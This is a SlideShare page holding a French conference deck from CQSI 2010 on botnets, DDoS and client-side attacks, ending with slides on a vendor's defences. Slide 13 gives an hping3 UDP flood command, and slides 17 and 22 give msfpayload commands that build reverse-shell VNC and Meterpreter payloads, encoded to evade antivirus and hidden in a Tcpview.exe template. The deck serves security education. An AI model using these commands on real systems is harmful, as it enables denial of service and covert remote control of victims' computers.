Maîtriser l’art du
Kung-Fu
19 octobre 2010
Colloque québécois de la sécurité de l'information
(CQSI)
Michel Cusin, Archite...
Slide 2
Agenda
• Maîtriser l’art du Kung-Fu ???
• Server-side Attacks “Attaques traditionnelles”
• Client-side Attacks “No...
Slide 3
Kung-Fu
Slide 3
• Kung-Fu qui signifie art martial, vient de la nécessité de légitime
défense.
• Les termes "Kung"...
Slide 4
Samouraï vs Ninja
vs
Samouraï Ninja
Slide 5
Samouraï vs Ninja
Qu’ont-ils en communs?
Ils maîtrisent leur art…
• Ils maîtrisent leurs techniques.
• Ils maîtris...
Slide 6
Professionnels de la sécurité vs Pirates
vs
(Samouraï) (Ninja)
Slide 7
Qu’avons-nous en communs?
• Maîtrise des techniques
• Utilisation des outils
• Connaissances
• Objectifs
Maîtrison...
Slide 8
Server-side Attacks
Server-side Attacks “Attaques traditionnelles”
Slide 9
Qu’est-ce qu’un Botnet
Bot
Bot
Bot
C&C
Bot
Pirate
Victime
Slide 10
Botnet à louer (IMDDOS)
• Botnet « commercial »
•10 000 nouvelles victime par jour
• Propagation (peer-to-peer)
•...
Slide 11
Les Botnets: Le Québec n’y échappe pas
Botnet: RTSS (Réseau de Télécommunication Sociaux Sanitaire)
• Le bot de l...
Slide 12
Qu’est-ce qu’un DDoS
DDoS: Distributed Denial of Service
(Déni de service distribué)
Slide 13
Démonstration DDoS
Simulation d’un DDoS
(Avec une seule machine)
Hping3 –udp –flood –rand-source -p 80 [IP Serveu...
Slide 14
L’envers de la médaille…
Slide 15
“Client-side attacks”
Client-side Attacks: La nouvelle tendance
Slide 16
Création d’un “Client-side attacks”
Metasploit Social Engineer Toolkit (SET)
Ultimate EXE Packer (UPX)
Slide 17
Metasploit
Le “framework” Metasploit est un outil pour le développement et
l'exécution d'exploits contre une mach...
Slide 18
VirusTotal
Plus de 40 antivirus différents…
Slide 19
Camouflage du “malware”
Le Ninja maîtrise l’art du camoufflage…
Slide 20
Attention!
Slide 21
Posez-vous la question
~300
Vulnérabilités découvertes et documentés au cours des 3 dernières années:
~90
~200
So...
Slide 22
Scénario d’un “client-side attack”
Connexion en sortie:
Port TCP 80 (HTTP)
ou 443 (HTTPS)
DefensePro
Serveur
Vict...
IPS: Protection par signatures statiques
• Procure une protection contre:
– Vers, Bots, Trojans, Hameçonage,
logiciels esp...
Protection DDoS : Signatures en temps réel
• Protection par signature créées automatiquement en temps réel contre
les atta...
Network Behavioral Analysis: Real-time Signatures Protection
• L’Analyse Comportementale Réseau (NBA - Network behavioral
...
Slide 26
Une question d’équilibre
Conclusion
C’est une question d’équilibre
ConnaissancesTechnologies
Slide 27
Questions?
La présentation sera disponible sur le site du CQSI ainsi que sur http://cusin.ca
Questions?
Coupon po...
Prochain SlideShare
Chargement dans…5
×

Maitriser l'art du kung fu cqsi2010

2 250 vues

Publié le

Publié dans : Technologie
0 commentaire
0 j’aime
Statistiques
Remarques
  • Soyez le premier à commenter

  • Soyez le premier à aimer ceci

Aucun téléchargement
Vues
Nombre de vues
2 250
Sur SlideShare
0
Issues des intégrations
0
Intégrations
823
Actions
Partages
0
Téléchargements
37
Commentaires
0
J’aime
0
Intégrations 0
Aucune incorporation

Aucune remarque pour cette diapositive

Maitriser l'art du kung fu cqsi2010

  1. 1. Maîtriser l’art du Kung-Fu 19 octobre 2010 Colloque québécois de la sécurité de l'information (CQSI) Michel Cusin, Architechte Sécurité Bell Jocelyn Rainville, SE Radware
  2. 2. Slide 2 Agenda • Maîtriser l’art du Kung-Fu ??? • Server-side Attacks “Attaques traditionnelles” • Client-side Attacks “Nouvelle tendance” • Démonstrations • Conséquences • Solutions
  3. 3. Slide 3 Kung-Fu Slide 3 • Kung-Fu qui signifie art martial, vient de la nécessité de légitime défense. • Les termes "Kung" et "Fu" traduits littéralement et séparément ont une signification différente: • "Kung" désigne la "maîtrise", le "perfectionnement". • "Fu" désigne les techniques en tant que contenu. Comment se porte votre Kung-Fu en sécurité ? • Kung-Fu en sécurité -> Maîtrise des techniques en sécurité. Mais qu’est-ce que le Kung-Fu?
  4. 4. Slide 4 Samouraï vs Ninja vs Samouraï Ninja
  5. 5. Slide 5 Samouraï vs Ninja Qu’ont-ils en communs? Ils maîtrisent leur art… • Ils maîtrisent leurs techniques. • Ils maîtrisent leurs armes. • Ils maîtrisent leurs spécialités. • Ils défendent ce en quoi ils croient.
  6. 6. Slide 6 Professionnels de la sécurité vs Pirates vs (Samouraï) (Ninja)
  7. 7. Slide 7 Qu’avons-nous en communs? • Maîtrise des techniques • Utilisation des outils • Connaissances • Objectifs Maîtrisons-nous notre art ? Professionnels de la sécurité vs Pirates
  8. 8. Slide 8 Server-side Attacks Server-side Attacks “Attaques traditionnelles”
  9. 9. Slide 9 Qu’est-ce qu’un Botnet Bot Bot Bot C&C Bot Pirate Victime
  10. 10. Slide 10 Botnet à louer (IMDDOS) • Botnet « commercial » •10 000 nouvelles victime par jour • Propagation (peer-to-peer) • Windows 7 crack • Autres noms attrayants • Portail « libre-service » • Support 7/24 • Made in China Source: http://www.damballa.com/IMDDOS/
  11. 11. Slide 11 Les Botnets: Le Québec n’y échappe pas Botnet: RTSS (Réseau de Télécommunication Sociaux Sanitaire) • Le bot de la St-Valentin (14 Février 2007) • Le bot était transporté par un ver • Réseau paralysé • Au moins l’auteur s’est excusé… Botnet: Opération Basique • Février 2008 • Plus de 100 pays sont touchés, sur tous les continents. • 17 arrestations (de 17 à 26 ans dont 3 mineurs) • Débût de l’enquête: Été 2006 Source: http://www.sq.gouv.qc.ca/salle-de-presse/communiques/demantelement-reseau-pirates-informatiques-2008.jsp
  12. 12. Slide 12 Qu’est-ce qu’un DDoS DDoS: Distributed Denial of Service (Déni de service distribué)
  13. 13. Slide 13 Démonstration DDoS Simulation d’un DDoS (Avec une seule machine) Hping3 –udp –flood –rand-source -p 80 [IP Serveur Web] Defense Pro
  14. 14. Slide 14 L’envers de la médaille…
  15. 15. Slide 15 “Client-side attacks” Client-side Attacks: La nouvelle tendance
  16. 16. Slide 16 Création d’un “Client-side attacks” Metasploit Social Engineer Toolkit (SET) Ultimate EXE Packer (UPX)
  17. 17. Slide 17 Metasploit Le “framework” Metasploit est un outil pour le développement et l'exécution d'exploits contre une machine distante. VNCINJECT: ./msfpayload windows/vncinject/reverse_tcp LHOST=10.0.0.10 LPORT=443 R | ./msfencode -c 5 -e x86/shikata_ga_nai -x /home/Tcpview.exe -t exe > rev_vnc.exe Meterpreter: ./msfpayload windows/meterpreter/reverse_tcp LHOST=10.0.0.10 LPORT=443 R | ./msfencode -c 5 -e x86/shikata_ga_nai -x /home/Tcpview.exe -t exe > rev_vnc.exe
  18. 18. Slide 18 VirusTotal Plus de 40 antivirus différents…
  19. 19. Slide 19 Camouflage du “malware” Le Ninja maîtrise l’art du camoufflage…
  20. 20. Slide 20 Attention!
  21. 21. Slide 21 Posez-vous la question ~300 Vulnérabilités découvertes et documentés au cours des 3 dernières années: ~90 ~200 Sources: http://nvd.nist.gov/ et http://osvdb.org/ Est-ce que votre stratégie de mise à jour inclue ces produits? Vraiment…?
  22. 22. Slide 22 Scénario d’un “client-side attack” Connexion en sortie: Port TCP 80 (HTTP) ou 443 (HTTPS) DefensePro Serveur Victime Coupe-feuPirate Environnement corporatif VNCINJECT: ./msfpayload windows/vncinject/reverse_tcp LHOST=10.0.0.10 LPORT=443 R | ./msfencode -c 5 -e x86/shikata_ga_nai -x /home/Tcpview.exe -t exe > rev_vnc.exe
  23. 23. IPS: Protection par signatures statiques • Procure une protection contre: – Vers, Bots, Trojans, Hameçonage, logiciels espions – Web, courriel, SQL, VoIP (SIP), vulnérabilités DNS – Proxy anonymiseur, attaques IPv6 – Vulnérabilités Microsoft – Anomalies de protocol • Protection par signatures: – Équipe de pointe de recherche en sécurité – Protection contre l’exploitation des vulnérabilités connues – Mise à jour hebdomadaire et d’urgence des signatures Slide 23
  24. 24. Protection DDoS : Signatures en temps réel • Protection par signature créées automatiquement en temps réel contre les attaques DDoS réseau: – SYN floods; – TCP floods; – UDP/ICMP floods. • Proposition de valeur – Maintiens de la disponibilité des applications critiques, même durant les attaques; – Blocage des attaques sans bloquer le trafic des utilisateurs légitimes; – Protection automatique en temps réel contre les inondations réseau (floods) sans nécessiter d'intervention humaine. Slide 24
  25. 25. Network Behavioral Analysis: Real-time Signatures Protection • L’Analyse Comportementale Réseau (NBA - Network behavioral analysis) détecte les transactions anormales au niveau des utilisateurs ainsi que des applications. • Protection par signatures automatiques en temps réel contre: – Propagation de logiciel malveillant “Zéro-minute” – Mauvaise utilisation des ressources d’applications comme: • Attaques de type “Brute force” • Balayages d’application Web • Inondations (floods) de page HTTP • Balayages SIP • Inondations (flood) SIP • Proposition de valeur – Maintiens de la disponibilité des applications critiques, même durant les attaques; – Blocage des attaques sans bloquer le trafic des utilisateurs légitimes; – Protection automatique en temps réel contre les inondations réseau (floods) sans nécessiter d'intervention humaine. Slide 25
  26. 26. Slide 26 Une question d’équilibre Conclusion C’est une question d’équilibre ConnaissancesTechnologies
  27. 27. Slide 27 Questions? La présentation sera disponible sur le site du CQSI ainsi que sur http://cusin.ca Questions? Coupon pour le tirage d’une formation SANS gratuite en français: Détection de pirates informatiques pour administrateurs de systèmes Info sur http://www.sans.org et sur http://cusin.ca

×